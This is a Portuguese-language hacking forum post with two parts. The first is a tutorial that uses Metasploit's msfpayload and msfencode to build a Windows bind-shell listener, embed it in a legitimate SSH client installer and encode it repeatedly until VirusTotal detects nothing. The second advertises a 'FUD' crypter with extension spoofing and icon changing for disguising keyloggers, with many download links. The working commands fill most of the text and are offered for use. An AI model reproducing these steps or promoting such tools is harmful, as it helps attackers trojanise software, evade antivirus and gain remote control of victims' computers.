Search the Community

Tou meio sumido mais hoje to ai ne :D O que você precisa? Ter instalado Linux BackTrack, em seu Computador [Ou instale na maquina virtual]. Criando um Listener Esse comando e simples que dá o controle remoto como uma invasão de uma máquina. Não é um vírus, e não se espalhar, mas é detectado por antivírus. Em BackTrack, abra a janela de comando e digita o comando abaixo: Comando: msfpayload windows/shell_bind_tcp LPORT=2482 X &--#62; /root/listen.exe ls -l listen.exe Você deverá ver o arquivo listen.exe, como o da imagem abaixo: Analisando com VirusTotal Vá ate o site https://www.virustotal.com/ Clique no botão "Selecionar arquivo". Navegue para / root e dê um duplo clique no [listen.exe] Apos isso clique em "Analise" Se você ver uma mensagem "O arquivo já analisados", clique em "Ver última análise" A análise mostra que muitos dos antivírus detectou o arquivo - [33 de 42], mas muitos dos motores de virus vão detectár. Salvando a imagem da tela Certifique-se que do resultado"detecção: 33/42", Salvar a imagem nome "Virus Total 1". Codifica a Listener Este processo irá codifica-ló e inseri-lo em um arquivo SSH. Agora execute os seguintes comandos: wget ftp://ftp.ccsf.edu/p...lient-3.2.9.exe msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1 ls -l evil* Você deverá ver o arquivo mal-ssh.exe, como mostrado abaixo: Analisando o Listener codificados com VirusTotal Vá ate o site https://www.virustotal.com/ Clique no botão "Selecionar arquivo". Navegue para / root e dê um duplo clique no [mal-ssh.exe] Apos isso clique em "Analise" Se você ver uma mensagem "O arquivo já analisados", clique em "Ver última análise" A análise mostra que foi detectado agora - [21 de 42] Ultima Codificação Este processo irá codificar com várias codificações diferentes. Agora execute esses comandos: msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1 msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1 msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1 msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1 ls -l listen* Você irá ver varios arquivos: Analisando o Listener codificado com VirusTotal Vá ate o site https://www.virustotal.com/ Clique no botão "Selecionar arquivo". Navegue para / root e dê um duplo clique no [listen5.exe] Apos isso clique em "Analise" Se você ver uma mensagem "O arquivo já analisados", clique em "Ver última análise" A análise mostra que foi detectado nada agora - [0 de 42]

Ja fiz um topico sobre deixar um server FUD, mas ágora a maioria dos Crypters São desatualizadas. entao, Hoje Vou mostrar um Crypter FUD 2013 (indetectável Pelos anti-vírus) Primeiro baixar Crypter [Final do Topico] Aqui você pode Juntar (Combinar) com qualquer outro arquivo ex: Exe, Text com seu arquivo Crypt Burlar o a extensão do arquivo Keylog de vírus... Características: FUD Crypter de 0/35 Arquivo FUD 0/35 Extensão Spoofer Icon Changer Relatório do Scann: http://www.2shared.c...ber-Gamers.html http://p57klv.1fichier.com/ http://www.4shared.c...ber-Gamers.html http://depositfiles....files/r4opxqvfq http://www.digzip.co...er-Gamers_.html http://www.mediafire...u18j9brpal4gekd http://www.mirrorcre...mers_.rar_links http://www.sendspace.com/file/8i4sd9 http://rapidshare.co...r-Gamers%5D.rar http://www.ziddu.com...Gamers.rar.html http://www22.zippysh...48228/file.html https://www.virustotal.com/pt/file/76f03972f2f8cabecfb3a7059c3f6da5e099293e04c59c79eefc54c48148d89a/analysis/1365038371/